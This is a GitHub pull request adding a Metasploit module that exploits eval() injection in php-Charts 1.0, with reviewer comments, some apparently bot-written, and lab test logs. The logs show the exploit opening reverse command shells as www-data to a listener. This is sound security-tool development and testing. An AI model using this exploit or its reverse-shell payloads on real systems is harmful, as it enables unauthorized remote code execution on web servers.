Add php-Charts v1.0 PHP Code Execution Exploit #1341

Merged
merged 3 commits into from Jan 20, 2013


@bcoles
Contributor
bcoles commented Jan 20, 2013

Add php-Charts v1.0 PHP Code Execution Vulnerability exploit module

@jvazquez-r7 jvazquez-r7 commented on an outdated diff Jan 20, 2013
modules/exploits/multi/http/php_charts_exec.rb
+ 'Name' => "PHP-Charts v1.0 PHP Code Execution Vulnerability",
+ 'Description' => %q{
+ This module exploits a PHP code execution vulnerability in php-Charts
+ version 1.0 which could be abused to allow users to execute arbitrary
+ PHP code under the context of the webserver user. The 'url.php' script
+ calls eval() with user controlled data from any HTTP GET parameter name.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'AkaStep', # Discovery
+ 'Brendan Coles <bcoles[at]gmail.com>' # msf exploit
+ ],
+ 'References' =>
+ [
+ ['URL', 'http://www.exploit-db.com/exploits/24201/'],
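Review bot: the exploit-db entry in the 'References' array is declared as a 'URL' reference; Metasploit has a dedicated 'EDB' reference type for exploit-db ids, so the entry should be `['EDB', '24201']` rather than the bare URL. While touching this array, the OSVDB entry 89334 mentioned in review should be added as an 'OSVDB' reference, and no 'DisclosureDate' appears in this hunk, so make sure the module metadata carries one before merge.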
@jvazquez-r7
jvazquez-r7 Jan 20, 2013 Contributor

It's an EDB reference, not URL

@jvazquez-r7
jvazquez-r7 Jan 20, 2013 Contributor

There is also OSVDB reference for this vulnerability: http://www.osvdb.org/show/osvdb/89334 , could you please add the reference?

@jvazquez-r7 jvazquez-r7 commented on an outdated diff Jan 20, 2013
modules/exploits/multi/http/php_charts_exec.rb
+ ['URL', 'http://www.exploit-db.com/exploits/24201/'],
+ ],
+ 'Payload' =>
+ {
+ 'BadChars' => "\x00\x0a\x0d\x22",
+ 'Compat' =>
+ {
+ 'PayloadType' => 'cmd',
+ 'RequiredCmd' => 'generic telnet bash netcat-e perl ruby python',
+ }
+ },
+ 'DefaultOptions' =>
+ {
+ 'ExitFunction' => "none"
+ },
+ 'Platform' => 'unix',
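Review bot: 'Platform' is set to 'unix' only, so the module path modules/exploits/multi/http/ does not match what this hunk declares; either move the module under the unix/webapp tree or add further targets so the "multi" location is earned. Two style points in the same hunk: the 'Compat' hash keeps a trailing comma after the 'RequiredCmd' entry, and 'ExitFunction' => "none" uses double quotes where the surrounding metadata uses single quotes, so both should be normalised for consistency.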
@jvazquez-r7
jvazquez-r7 Jan 20, 2013 Contributor

Seems like unix/webapps would be a better location than multi/http for this exploit; please could you move it?

Or add more targets to really make it a "multi" platform exploit :)

@jvazquez-r7
Contributor

Tested successfully:

msf  exploit(php_charts_exec) > set rhost 192.168.1.154
rhost => 192.168.1.154
msf  exploit(php_charts_exec) > check
[*] 192.168.1.154:80 - Sending check
[+] The target is vulnerable.
msf  exploit(php_charts_exec) > rexploit
[*] Reloading module...
[*] 192.168.1.154:80 - Sending payload (702 bytes)
[*] Started reverse double handler
[+] 192.168.1.154:80 - Payload sent successfully
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo sQkJsNt3VTXIrM6l;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "sQkJsNt3VTXIrM6l\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.1.128:4444 -> 192.168.1.154:46786) at 2013-01-20 17:11:45 +0100
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
^C
Abort session 1? [y/N]  y
[*] 192.168.1.154 - Command shell session 1 closed.  Reason: User exit

Once comments are fixed I think we'll be ready to merge it :-)

@jvazquez-r7 jvazquez-r7 merged commit dc318c5 into rapid7:master Jan 20, 2013
@jvazquez-r7
Contributor

Thanks,

Test after changes:

msf  exploit(php_charts_exec) > set rhost 192.168.1.154
rhost => 192.168.1.154
msf  exploit(php_charts_exec) > exploit
[*] 192.168.1.154:80 - Sending payload (702 bytes)
[*] Started reverse double handler
[*] Accepted the first client connection...
[+] 192.168.1.154:80 - Payload sent successfully
[*] Accepted the second client connection...
[*] Command: echo D0GYAZBZleRafqnB;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "D0GYAZBZleRafqnB\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.1.128:4444 -> 192.168.1.154:46790) at 2013-01-20 17:36:30 +0100
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
^C
Abort session 1? [y/N]  y
[*] 192.168.1.154 - Command shell session 1 closed.  Reason: User exit

Merged after updating references and disclosure date!
